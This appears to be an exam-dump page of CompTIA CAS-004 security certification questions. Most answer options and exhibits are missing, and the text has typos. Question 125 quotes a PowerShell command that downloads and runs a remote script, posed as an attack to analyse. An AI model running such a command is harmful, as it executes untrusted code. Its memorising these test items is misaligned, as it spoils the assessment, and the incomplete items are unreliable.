Improve Your Knowledge with CAS-004 Exam Dumps

1. Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts partial responsibility for application-level controls to the cloud provider.

In the shared responsibility model, which of the following levels of service meets this requirement?

2. A security consultant is designing an infrastructure security solution for a client company that has provided the following requirements:

• Access to critical web services at the edge must be redundant and highly available.

• Secure access services must be resilient to a proprietary zero-day vulnerability in a single component.

• Automated transition of secure access solutions must be able to be triggered by defined events or manually by security operations staff.

Which of the following solutions BEST meets these requirements?

3. An organization is deploying a new, online digital bank and needs to ensure availability and performance.

The cloud-based architecture is deployed using PaaS and SaaS solutions, and it was designed with the following considerations:

- Protection from DoS attacks against its infrastructure and web applications is in place.

- Highly available and distributed DNS is implemented.

- Static content is cached in the CDN.

- A WAF is deployed inline and is in block mode.

- Multiple public clouds are utilized in an active-passive architecture.

With the above controls in place, the bank is experiencing a slowdown on the unauthenticated payments page.

Which of the following is the MOST likely cause?

4. A company that all mobile devices be encrypted, commensurate with the full disk encryption scheme of assets, such as workstation, servers, and laptops.

Which of the following will MOST likely be a limiting factor when selecting mobile device managers for the company?

5. A company Invested a total of $10 million lor a new storage solution Installed across live on-site datacenters. Fitly percent of the cost of this Investment was for solid-state storage. Due to the high rate of wear on this storage, the company Is estimating that 5% will need to be replaced per year.

Which of the following is the ALE due to storage replacement?

6. A security engineer estimates the company’s popular web application experiences 100 attempted breaches per day. In the past four years, the company’s data has been breached two times.

Which of the following should the engineer report as the ARO for successful breaches?

7. A pharmaceutical company was recently compromised by ransomware.

Given the following EDR output from the process investigation:





On which of the following devices and processes did the ransomware originate?

8. A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate personnel are allowed access.

Which of the following risk techniques did the department use in this situation?

А. Accept

В. Avoid

C. Transfer

D. Mitigate

9. A company has decided to purchase a license for software that is used to operate a mission-critical process. The third-party developer is new to the industry but is delivering what the company needs at this time.

Which of the following BEST describes the reason why utilizing a source code escrow will reduce the operational risk to the company if the third party stops supporting the application?

10. The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.

Which of the following testing methods would be BEST for the engineer to utilize in this situation?

11. Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:

12. A company wants to use a process to embed a sign of ownership covertly inside a proprietary document without adding any identifying attributes.

Which of the following would be best to use as part of the process to support copyright protections of the document?

13. A Chief information Security Officer (CISO) is developing corrective-action plans based on the following from a vulnerability scan of internal hosts:





Which of the following MOST appropriate corrective action to document for this finding?

14. During a review of events, a security analyst notes that several log entries from the FIM system identify changes to firewall rule sets. While coordinating a response to the FIM entries, the analyst receives alerts from the DLP system that indicate an employee is sending sensitive data to an external email address.

Which of the following would be the most relevant to review in order to gain a better understanding of whether these events are associated with an attack?

15. An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key.

Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string?

16. An architectural firm is working with its security team to ensure that any draft images that are leaked

to the public can be traced back to a specific external party.

Which of the following would BEST accomplish this goal?

17. A company is looking for a solution to hide data stored in databases.

The solution must meet the following requirements:

Be efficient at protecting the production environment

Not require any change to the application

Act at the presentation layer

Which of the following techniques should be used?

18. A Chief Information Security Officer is concerned about the condition of the code security being used for web applications. It is important to get the review right the first time, and the company is willing to use a tool that will allow developers to validate code as it is written.

Which of the following methods should the company use?

19. During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. upon rebooting the machine, a malicious script that

was running as a background process was no longer present. As a result, potentially useful evidence was lost.

Which of the following should the security analyst have followed?

20. A security architect Is analyzing an old application that is not covered for maintenance anymore because the software company is no longer in business.

Which of the following techniques should have been Implemented to prevent these types of risks?

21. A security architect is reviewing the following proposed corporate firewall architecture and configuration:





Both firewalls are stateful and provide Layer 7 filtering and routing.

The company has the following requirements:

Web servers must receive all updates via HTTP/S from the corporate network.

Web servers should not initiate communication with the Internet.

Web servers should only connect to preapproved corporate database servers.

Employees’ computing devices should only connect to web services over ports 80 and 443.

Which of the following should the architect recommend to ensure all requirements are met in the MOST secure manner? (Choose two.)

22. A security engineer is concerned about the threat of side-channel attacks The company experienced a past attack that degraded parts of a SCADA system, causing a fluctuation to 20,000rpm from its normal operating range As a result, the part deteriorated more quickly than the mean time to failure A further investigation revealed the attacker was able to determine the acceptable rpm range, and the malware would then fluctuate the rpm until the pan failed.

Which of the following solutions would be best to prevent a side-channel attack in the future?

23. Based on a recent security audit, a company discovered the perimeter strategy is inadequate for its recent growth.

To address this issue, the company is looking for a solution that includes the following requirements:

• Collapse of multiple network security technologies into a single footprint

• Support for multiple VPNs with different security contexts

• Support for application layer security (Layer 7 of the OSI Model)

Which of the following technologies would be the most appropriate solution given these requirements?

24. A security architect is tasked with securing a new cloud-based videoconferencing and collaboration platform to support a new distributed workforce.

The security architect's key objectives are to:

• Maintain customer trust

• Minimize data leakage

• Ensure non-repudiation

Which of the following would be the BEST set of recommendations from the security architect?

25. A company would like to move its payment card data to a cloud provider.

Which of the following solutions will best protect account numbers from unauthorized disclosure?

26. After a security incident, a network security engineer discovers that a portion of the company’s sensitive external traffic has been redirected through a secondary ISP that is not normally used.

Which of the following would BEST secure the routes while allowing the network to function in the event of a single provider failure?

27. A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.

Which of the following techniques would BEST support this?

28. During a remodel, a company’s computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room. The company wants to be able to identify any unauthorized individuals who enter the storage room by following an authorized employee.

Which of the following processes would BEST satisfy this requirement?

29. A company suspects a web server may have been infiltrated by a rival corporation.

The security engineer reviews the web server logs and finds the following:





The security engineer looks at the code with a developer, and they determine the log entry is created when the following line is run:





Which of the following is an appropriate security control the company should implement?

30. A company is in the process of refreshing its entire infrastructure The company has a business-critical process running on an old 2008 Windows server If this server fails, the company would lose millions of dollars in revenue.

Which of the following actions should the company should take?

31. A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls.

Which of the following BEST describes the risk associated with this implementation?

32. A company has hired a security architect to address several service outages on the endpoints due to new malware. The Chief Executive Officer’s laptop was impacted while working from home. The goal is to prevent further endpoint disruption. The edge network is protected by a web proxy.

Which of the following solutions should the security architect recommend?

33. The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations to deliver a service, is concerned about the handling and security of customer data by the parties.

Which of the following should be implemented to BEST manage the risk?

34. A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.

Which of the following would BEST secure the company’s CI/CD pipeline?

35. A SOC analyst is reviewing malicious activity on an external, exposed web server. During the investigation, the analyst determines specific traffic is not being logged, and there is no visibility from the WAF for the web application.

Which of the following is the MOST likely cause?

36. A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private.

Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly?

37. An internal security assessor identified large gaps in a company's IT asset inventory system during a monthly asset review. The assessor is aware of an external audit that is underway. In an effort to avoid external findings, the assessor chooses not to report the gaps in the inventory system.

Which of the following legal considerations is the assessor directly violating?

38. A security is assisting the marketing department with ensuring the security of the organization’s social media platforms.

The two main concerns are:

The Chief marketing officer (CMO) email is being used department wide as the username The password has been shared within the department

Which of the following controls would be BEST for the analyst to recommend?

39. A health company has reached the physical and computing capabilities in its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare application that process sensitive health and payment information.

Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standard for virtualization and cloud computing?

40. A company recently migrated its critical web application to a cloud provider's environment. As part of the company's risk management program, the company intends to conduct an external penetration test. According to the scope of work and the rules of engagement, the penetration tester will validate the web application's security and check for opportunities to expose sensitive company information in the newly migrated cloud environment.

Which of the following should be the first consideration prior to engaging in the test?

41. Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.

Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner?

42. Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?

43. Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Select TWO).

44. An organization developed a containerized application. The organization wants to run the application in the cloud and automatically scale it based on demand. The security operations team would like to use container orchestration but does not want to assume patching responsibilities.

Which of the following service models best meets these requirements?

45. Which of the following BEST describes a common use case for homomorphic encryption ?

A. Processing data on a server after decrypting in order to prevent unauthorized access in transit

B. Maintaining the confidentiality of data both at rest and in transit to and from a CSP for processing

C. Transmitting confidential data to a CSP for processing on a large number of resources without

revealing information

D. Storing proprietary data across multiple nodes in a private cloud to prevent access by unauthenticated users

46. A company has been the target of LDAP injections, as well as brute-force, whaling, and spear-phishing attacks. The company is concerned about ensuring continued system access. The company has already implemented a SSO system with strong passwords.

Which of the following additional controls should the company deploy?

47. An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems.

Which of the following is the MOST likely security consequence of this attack?

48. A Chief Security Officer (CSO) is concerned about the number of successful ransomware attacks that have hit the company. The data Indicates most of the attacks came through a fake email. The company has added training, and the CSO now wants to evaluate whether the training has been successful.

Which of the following should the CSO implement?

49. A security engineer is re-architecting a network environment that provides regional electric distribution services.

During a pretransition baseline assessment, the engineer identified the following security-relevant characteristics of the environment:

• Enterprise IT servers and supervisory industrial systems share the same subnet.

• Supervisory controllers use the 750MHz band to direct a portion of fielded PLCs.

• Command and telemetry messages from industrial control systems are unencrypted and unauthenticated.

Which of the following re-architecture approaches would be best to reduce the company's risk?

50. A security analyst wants to keep track of alt outbound web connections from workstations. The analyst's company uses an on-premises web filtering solution that forwards the outbound traffic to a perimeter firewall. When the security analyst gets the connection events from the firewall, the source IP of the outbound web traffic is the translated IP of the web filtering solution. Considering this scenario involving source NAT.

Which of the following would be the BEST option to inject in the HTTP header to include the real source IP from workstations?

51. The OS on several servers crashed around the same time for an unknown reason. The servers were restored to working condition, and all file integrity was verified.

Which of the following should the incident response team perform to understand the crash and prevent it in the future?

52. A financial institution generates a list of newly created accounts and sensitive information on a daily basis. The financial institution then sends out a file containing thousands of lines of data.

Which of the following would be the best way to reduce the risk of a malicious insider making changes to the file that could go undetected?

53. Company A is merging with Company B Company A is a small, local company Company B has a large, global presence The two companies have a lot of duplication in their IT systems processes, and procedures. On the new Chief Information Officer's (ClO's) first day a fire breaks out at Company B's mam data center.

Which of the following actions should the CIO take first?

54. A PKI engineer is defining certificate templates for an organization's CA and would like to ensure at least two of the possible SAN certificate extension fields populate for documentation purposes.

Which of the following are explicit options within this extension? (Select two).

55. A forensics investigator is analyzing an executable file extracted from storage media that was submitted (or evidence The investigator must use a tool that can identify whether the executable has indicators, which may point to the creator of the file.

Which of the following should the investigator use while preserving evidence integrity?

56. A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems.

Some of the requirements are:

• Handle an increase in customer demand of resources

• Provide quick and easy access to information

• Provide high-quality streaming media

• Create a user-friendly interface

Which of the following actions should be taken FIRST?

57. During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place.

Which of the following Is the MOST likely solution?

58. A Chief Information Security Officer (CISO) reviewed data from a cyber exercise that examined all aspects of the company's response plan.

Which of the following best describes what the CISO reviewed?

59. SIMULATION

A security engineer needs to review the configurations of several devices on the network to meet the following requirements:

• The PostgreSQL server must only allow connectivity in the 10.1.2.0/24 subnet.

• The SSH daemon on the database server must be configured to listen to port 4022.

• The SSH daemon must only accept connections from a Single workstation.

• All host-based firewalls must be disabled on all workstations.

• All devices must have the latest updates from within the past eight days.

• All HDDs must be configured to secure data at rest.

• Cleartext services are not allowed.

• All devices must be hardened when possible.

Instructions:

Click on the various workstations and network devices to review the posture assessment results.

Remediate any possible issues or indicate that no issue is found.

Click on Server A to review output data. Select commands in the appropriate tab to remediate connectivity problems to the pOSTGREsql

DATABASE VIA ssh





WAP A





PC A





Laptop A





Switch A





Switch B:





Laptop B





PC B





PC C





Server A

60. An organization wants to perform a scan of all its systems against best practice security configurations.

Which of the following SCAP standards, when combined, will enable the organization to view each of the configuration checks in a machine-readable checklist format for fill automation? (Choose two.)

61. In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties.

In a shared responsibility model, which of the following responsibilities belongs to the provider in a Paas implementation?

A. Application-specific data assets

B. Application user access management

C. Application-specific logic and code

D. Application/platform software

62. An engineering team is developing and deploying a fleet of mobile devices to be used for specialized inventory management purposes.

These devices should:

* Be based on open-source Android for user familiarity and ease.

* Provide a single application for inventory management of physical assets.

* Permit use of the camera be only the inventory application for the purposes of scanning

* Disallow any and all configuration baseline modifications.

* Restrict all access to any device resource other than those requirement?

63. Two companies that recently merged would like to unify application access between the companies, without initially merging internal authentication stores.

Which of the following technical strategies would best meet this objective?

64. A security analyst has been tasked with providing key information in the risk register.

Which of the following outputs or results would be used to BEST provide the information needed to determine the security posture for a risk decision? (Select TWO).

65. A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the Jogs. the compromised workstation was observed connecting to multiple databases through ODBC.

The following query behavior was captured:





Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain?

A) Personal health information: Inform the human resources department of the breach and review the DLP logs.

В) Account history; Inform the relationship managers of the breach and create new accounts for the affected users.

C) Customer IDs: Inform the customer service department of the breach and work to change the account numbers.

D) PAN: Inform the legal department of the breach and look for this data in dark web monitoring.

66. An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PI I and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards.

The assessment identifies the following:

1) There will be a 520,000 per day revenue loss for each day the system is delayed going into production.

2) The inherent risk is high.

3) The residual risk is low.

4) There will be a staged deployment to the solution rollout to the contact center.

Which of the following risk-handling techniques will BEST meet the organization's requirements?

67. An organization is running its e-commerce site in the cloud. The capacity is sufficient to meet the organization's needs throughout most of the year, except during the holidays when the organization plans to introduce a new line of products and expects an increase in traffic. The organization is not sure how well its products will be received.

To address this issue, the organization needs to ensure that:

* System capacity is optimized.

* Cost is reduced.

Which of the following should be implemented to address these requirements? (Select TWO).

68. A system administrator at a medical imaging company discovers protected health information (PHI) on a general-purpose file server.

Which of the following steps should the administrator take NEXT?

69. Which of the following objectives BEST supports leveraging tabletop exercises in business continuity planning?

70. A security analyst is reading the results of a successful exploit that was recently conducted by third-party penetration testers. The testers reverse engineered a privileged executable. In the report, the planning and execution of the exploit is detailed using logs and outputs from the test However, the attack vector of the exploit is missing, making it harder to recommend remediation’s.

Given the following output:





The penetration testers MOST likely took advantage of:

71. A security engineer needs to recommend a solution that will meet the following requirements:

Identify sensitive data in the provider’s network

Maintain compliance with company and regulatory guidelines

Detect and respond to insider threats, privileged user threats, and compromised accounts Enforce datacentric security, such as encryption, tokenization, and access control

Which of the following solutions should the security engineer recommend to address these requirements?

72. The Chief Executive Officer of an online retailer notices a sudden drop in sales A security analyst at the retailer detects a redirection of unsecure web traffic to a competitor's site.

Which of the following would best prevent this type of attack?

73. A security engineer is reviewing a record of events after a recent data breach incident that Involved the following:

• A hacker conducted reconnaissance and developed a footprint of the company s Internet-facing web application assets.

• A vulnerability in a third-party horary was exploited by the hacker, resulting in the compromise of a local account.

• The hacker took advantage of the account's excessive privileges to access a data store and exfiltrate the data without detection.

Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?

74. An organization needs to classify its systems and data in accordance with external requirements.

Which of the following roles is best qualified to perform this task?

75. Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution?

76. An loT device implements an encryption module built within its SoC where the asymmetric private key has been defined in a write-once read-many portion of the SoC hardware.

Which of the following should the loT manufacture do if the private key is compromised?

77. A company is on a deadline to roll out an entire CRM platform to all users at one time. However, the company is behind schedule due to reliance on third-party vendors.

Which of the following development approaches will allow the company to begin releases but also continue testing and development for future releases?

78. Which of the following provides the best solution for organizations that want to securely back up the MFA seeds for its employees in a central, offline location with minimal management overhead?

79. A software developer has been tasked with creating a unique threat detection mechanism that is based on machine learning. The information system for which the tool is being developed is on a rapid CI/CD pipeline, and the tool developer is considered a supplier to the process.

Which of the following presents the most risk to the development life cycle and lo the ability to deliver the security tool on time?

80. A forensic investigator started the process of gathering evidence on a laptop in response to an incident The investigator took a snapshof of the hard drive, copied relevant log files and then performed a memory dump.

Which of the following steps in the process should have occurred first?

81. Which of the following is a risk associated with SDN?

82. A company hired a third party to develop software as part of its strategy to be quicker to market. The company’s policy outlines the following requirements: https://i.postimg.cc/8P9sB3zx/image.png

The credentials used to publish production software to the container registry should be stored in a secure location.

Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly.

Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials?

83. A recent security assessment generated a recommendation to transition Wi-Fi to WPA2/WPA3 Enterprise requiring EAP-TLS.

Which of the following conditions must be met for the organization's mobile devices to be able to successfully join the corporate wireless network?

84. Which of the following are risks associated with vendor lock-in? (Choose two.)

85. Which of the following technologies allows CSPs to add encryption across multiple data storages?

86. Which of the following is the primary reason that a risk practitioner determines the security boundary prior to conducting a risk assessment?

87. To save time, a company that is developing a new VPN solution has decided to use the OpenSSL library within Its proprietary software.

Which of the following should the company consider to maximize risk reduction from vulnerabilities introduced by OpenSSL?

88. A managed security provider (MSP) is engaging with a customer who was working through a complete digital transformation Part of this transformation involves a move to cloud servers to ensure a scalable, high-performance, online user experience.

The current architecture includes:

• Directory servers

• Web servers

• Database servers

• Load balancers

• Cloud-native VPN concentrator

• Remote access server

The MSP must secure this environment similarly to the infrastructure on premises.

Which of the following should the MSP put in place to BEST meet this objective? (Select THREE)

89. Which of the following BEST sets expectation between the security team and business units within an organization?

90. Which of the following is a benefit of using steganalysis techniques in forensic response?

91. Which of the following best describes what happens if chain of custody is broken?

92. Which of the following describes how a risk assessment is performed when an organization has a critical vendor that provides multiple products?

93. A systems administrator was given the following IOC to detect the presence of a malicious piece of software communicating with its command-and-control server: post /malicious. php

User-Agent: Malicious Tool V 1.0

Host: www.rcalicious.com

The IOC documentation suggests the URL is the only part that could change.

Which of the following regular expressions would allow the systems administrator to determine if any of the company hosts are compromised, while reducing false positives?

94. A company's Chief Information Officer wants to Implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide Information on attempted attacks, and provide analysis of malicious activities to determine the processes or users Involved.

Which of the following would provide this information?

95. A forensic investigator would use the foremost command for:

96. The Chief Information Security Officer (CISO) asked a security manager to set up a system that sends an alert whenever a mobile device enters a sensitive area of the company's data center. The CISO would also like to be able to alert the individual who is entering the area that the access was logged and monitored.

Which of the following would meet these requirements?

97. A cybersecurity engineer analyst a system for vulnerabilities. The tool created an OVAL. Results document as output.

Which of the following would enable the engineer to interpret the results in a human readable form? (Select TWO.)

98. A SOC analyst received an alert about a potential compromise and is reviewing the following SIEM logs:





Which of the following is the most appropriate action for the SOC analyst to recommend?

99. As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.

Which of the following BEST describes this kind of risk response?

100. An organization has an operational requirement with a specific equipment vendor The organization is located in the United States, but the vendor is located in another region.

Which of the following risks would be most concerning to the organization in the event of equipment failure?

101. DRAG DROP

An organization is planning for disaster recovery and continuity of operations.



INSTRUCTIONS

Review the following scenarios and instructions. Match each relevant finding to the affected host. After associating scenario 3 with the appropriate host(s), click the host to select the appropriate corrective action for that finding.

Each finding may be used more than once.

If at any time you would like to bring back the initial state of the simul-ation, please click the Reset All button.

102. Each of the malware samples has unique hashes tied to the user.

The analyst needs to identify whether existing endpoint controls are effective.

Which of the following risk mitigation techniques should the analyst use?

A. Update the incident response plan.

B. Blocklist the executable.

C. Deploy a honeypot onto the laptops.

D. Detonate in a sandbox.

103. A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company’s Chief Financial Officer loses a phone multiple times a year.

Which of the following will MOST likely secure the data on the lost device?

104. An organization's finance system was recently attacked. A forensic analyst is reviewing the contents

Of the compromised files for credit card data.

Which of the following commands should the analyst run to BEST determine whether financial data was lost?

105. Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.

Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?

106. A security analyst is reviewing SIEM events and is uncertain how to handle a particular event. The file is reviewed with the security vendor who is aware that this type of file routinely triggers this alert.

Based on this information, the security analyst acknowledges this alert Which of the following event classifications is MOST likely the reason for this action?

107. A security analyst is investigating a series of suspicious emails by employees to the security team. The email appear to come from a current business partner and do not contain images or URLs. No images or URLs were stripped from the message by the security tools the company uses instead, the emails only include the following in plain text.





Which of the following should the security analyst perform?

108. A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility.

Which of the following systems should the consultant review before making a recommendation?

109. An auditor needs to scan documents at rest for sensitive text. These documents contain both text and Images.

Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Select TWO).

110. A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN.

Which of the following solutions does this describe?

111. A security administrator needs to recommend an encryption protocol after a legacy stream cipher was deprecated when a security flaw was discovered. The legacy cipher excelled at maintaining strong cryptographic security and provided great performance for a streaming video service.

Which of the following AES modes should the security administrator recommend given these requirements?

112. In a shared responsibility model for PaaS, which of the following is a customer's responsibility?

113. An organization is designing a network architecture that must meet the following requirements:

Users will only be able to access predefined services.

Each user will have a unique allow list defined for access.

The system will construct one-to-one subject/object access paths dynamically.

Which of the following architectural designs should the organization use to meet these requirements?

114. A security manager has written an incident response playbook for insider attacks and is ready to begin testing it.

Which of the following should the manager conduct to test the playbook?

115. An analyst determined that the current process for manually handling phishing attacks within the company is ineffective. The analyst is developing a new process to ensure phishing attempts are handled internally in an appropriate and timely manner. One of the analyst's requirements is that a blocklist be updated automatically when phishing attempts are identified.

Which of the following would help satisfy this requirement?

116. A company is migrating its data center to the cloud. Some hosts had been previously isolated, but a risk assessment convinced the engineering team to reintegrate the systems. Because the systems were isolated, the risk associated with vulnerabilities was low.

Which of the following should the security team recommend be performed before migrating these servers to the cloud?

117. A security researcher identified the following messages while testing a web application:





Which of the following should the researcher recommend to remediate the issue?

118. A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company’s managed database, exposing customer information.

The company hosts the application with a CSP utilizing the IaaS model.

Which of the following parties is ultimately responsible for the breach?

119. Company A acquired Company В. During an audit, a security engineer found Company B’s environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A’s security

program.

Which of the following risk-handling techniques was used?

120. A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.

Which of the following techniques would be BEST suited for this requirement?

121. A bank is working with a security architect to find the BEST solution to detect database management system compromises.

The solution should meet the following requirements:

♦ Work at the application layer

♦ Send alerts on attacks from both privileged and malicious users

♦ Have a very low false positive

Which of the following should the architect recommend?

122. An administrator at a software development company would like to protect the integrity of the company's applications with digital signatures. The developers report that the signing process keeps failing on all applications. The same key pair used for signing, however, is working properly on the website, is valid, and is issued by a trusted CA.

Which of the following is MOST likely the cause of the signature failing?

123. A company based in the United States holds insurance details of EU citizens.

Which of the following must be adhered to when processing EU citizens' personal, private, and confidential data?

124. An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely.

Which of the following features of these devices MOST likely led to this decision? (Select TWO.)

125. A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

126. A developer needs to implement PKI in an autonomous vehicle's software in the most efficient and labor-effective way possible.

Which of the following will the developer MOST likely implement?

Certificate chain

127. Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts most of the responsibility for application-level controls to the cloud provider.

In the shared responsibility model, which of the following levels of service meets this requirement?

128. A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.

Which of the following does the business’s IT manager need to consider?

129. An organization has deployed a cloud-based application that provides virtual event services globally to clients. During a typical event, thousands of users access various entry pages within a short period of time. The entry pages include sponsor-related content that is relatively static and is pulled from a database. When the first major event occurs, users report poor response time on the entry pages.

Which of the following features is the most appropriate for the company to implement?

130. All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools.

The human resources department wants to use these tools to process sensitive information but is concerned the data could be:

Leaked to the media via printing of the documents

Sent to a personal email address

Accessed and viewed by systems administrators

Uploaded to a file storage site

Which of the following would mitigate the department’s concerns?

131. A security analyst is researching containerization concepts for an organization. The analyst is concerned about potential resource exhaustion scenarios on the Docker host due to a single application that is overconsuming available resources.

Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers?

132. A security analyst is reviewing the following output from a vulnerability scan from an organization's internet-facing web services:





Which of the following indicates a susceptibility whereby an attacker can take advantage of the trust relationship between the client and the server?

133. A compliance officer is responsible for selecting the right governance framework to protect individuals' data.

Which of the following is the appropriate framework for the company to consult when collecting international user data for the purpose of processing credit cards?

134. A help desk technician just informed the security department that a user downloaded a suspicious

file from internet explorer last night. The user confirmed accessing all the files and folders before going home from work. the next morning, the user was no longer able to boot the system and was presented a screen with a phone number. The technician then tries to boot the computer using wake-on-LAN, but the system would not come up.

Which of the following explains why the computer would not boot?

135. Law enforcement officials informed an organization that an investigation has begun.

Which of the following is the FIRST step the organization should take?

136. The Chief information Officer (CIO) asks the system administrator to improve email security at the company based on the following requirements:

* Transaction being requested by unauthorized individuals.

* Complete discretion regarding client names, account numbers, and investment information.

* Malicious attackers using email to malware and ransomeware.

* Exfiltration of sensitive company information.

The cloud-based email solution will provide anti-malware reputation-based scanning, signature-based scanning, and sandboxing.

Which of the following is the BEST option to resolve the boar’s concerns for this email migration?

137. A security analyst received a report that a suspicious flash drive was picked up in the office's waiting area, located beyond the secured door. The analyst investigated the drive and found malware designed to harvest and transmit credentials. Security cameras in the area where the flash drive was discovered showed a vendor representative dropping the drive.

Which of the following should the analyst recommend as an additional way to identify anyone who enters the building, in the event the camera system fails?

138. A company wants to reduce its backup storage requirement and is undertaking a data cleanup project.

Which of the following should a security administrator consider first when determining which data should be deleted?

139. A network administrator receives a ticket regarding an error from a remote worker who is trying to reboot a laptop. The laptop has not yet loaded the operating system, and the user is unable to continue the boot process. The administrator is able to provide the user with a recovery PIN, and the user is able to reboot the system and access the device as needed.

Which of the following is the MOST likely cause of the error?

140. Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system.

To help users with the transition, Company A is requiring the following:

• Before the merger is complete, users from both companies should use a single set of usernames and passwords.

• Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs.

• Users from Company B should be able to access Company A's available resources.

Which of the following are the BEST solutions? (Select TWO).

141. Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity?

142. A small company needs to reduce its operating costs. vendors have proposed solutions, which all focus on management of the company’s website and services. The Chief information Security Officer (CISO) insist all available resources in the proposal must be dedicated, but managing a private cloud is not an option.

Which of the following is the BEST solution for this company?

143. A security architect is reviewing the following organizational specifications for a new application:

• Be sessionless and API-based

• Accept uploaded documents with Pll, so all storage must be ephemeral

• Be able to scale on-demand across multiple nodes

• Restrict all network access except for the TLS port

Which of the following ways should the architect recommend the application be deployed in order to meet security and organizational infrastructure requirements?

144. A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encryption with associated data.

Which of the following algorithms, when combined into a cipher suite, will meet these requirements? (Choose three.)

145. During the development process, the team identifies major components that need to be rewritten. As a result, the company hires a security consultant to help address major process issues.

Which of the following should the consultant recommend to best prevent these issues from reoccurring in the future?

146. A common industrial protocol has the following characteristics:

• Provides for no authentication/security

• Is often implemented in a client/server relationship

• Is implemented as either RTU or TCP/IP

Which of the following is being described?

147. The Chief Information Security Officer is concerned about the possibility of employees downloading ‘malicious files from the internet and ‘opening them on corporate workstations.

Which of the following solutions would be BEST to reduce this risk?

148. A security analyst sees that a hacker has discovered some keys and they are being made available on a public website. The security analyst is then able to successfully decrypt the data using the keys from the website.

Which of the following should the security analyst recommend to protect the affected data?

149. An multinational organization was hacked, and the incident response team's timely action prevented a major disaster Following the event, the team created an after action report.

Which of the following is the primary goal of an after action review?

150. SIMULATION

A product development team has submitted code snippets for review prior to release.



INSTRUCTIONS

Analyze the code snippets, and then select one vulnerability, and one fix for each code snippet.

Code Snippet 1





Code Snippet 2





Vulnerability 1:

SQL injection

Cross-site request forgery

Server-side request forgery

Indirect object reference

Cross-site scripting

Fix 1:

Perform input sanitization of the userid field.

Perform output encoding of queryResponse,

Ensure usex:ia belongs to logged-in user.

Inspect URLS and disallow arbitrary requests.

Implement anti-forgery tokens.

Vulnerability 2

1) Denial of service

2) Command injection

3) SQL injection

4) Authorization bypass

5) Credentials passed via GET

Fix 2

A) Implement prepared statements and bind variables.

B) Remove the serve_forever instruction.

C) Prevent the "authenticated" value from being overridden by a GET parameter.

D) HTTP POST should be used for sensitive parameters.

E) Perform input sanitization of the userid field.

